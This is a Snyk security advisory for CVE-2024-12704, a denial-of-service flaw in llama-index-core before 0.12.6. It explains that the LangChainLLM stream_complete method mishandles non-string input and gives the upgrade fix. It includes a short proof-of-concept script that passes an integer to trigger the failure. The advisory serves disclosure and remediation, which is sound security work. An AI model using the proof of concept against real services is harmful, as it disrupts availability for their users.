Improper Handling of Exceptional Conditions Affecting llama-index-core package, versions [,0.12.6)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-PYTHON-LLAMAINDEXCORE-9511125
  • published24 Mar 2025
  • disclosed20 Mar 2025
  • creditMassimiliano Pippi

Introduced: 20 Mar 2025

NewCVE-2024-12704  (opens in a new tab)
CWE-755  (opens in a new tab)

How to fix?

Upgrade llama-index-core to version 0.12.6 or higher.

Overview

llama-index-core is an Interface between LLMs and your data

Affected versions of this package are vulnerable to Improper Handling of Exceptional Conditions via the stream_complete method of the LangChainLLM class. An attacker can disrupt service availability by providing an input of type integer instead of a string and causing an error in the stream function where the thread terminates due to the error, but the process continues to run.

PoC

import openai
from llama_index.llms.langchain import LangChainLLM
import os
from langchain_openai import ChatOpenAI

os.environ["OPENAI_API_KEY"] = "<YOUR_API_KEY>"
openai.api_key = os.environ["OPENAI_API_KEY"]

llm = LangChainLLM(llm = ChatOpenAI(model="gpt-3.5-turbo"))
messages = 123

# Generate response
response_gen = llm.stream_complete(messages)
for delta in response_gen:
    print(delta.delta, end="")
print("\n")

CVSS Base Scores

version 4.0
version 3.1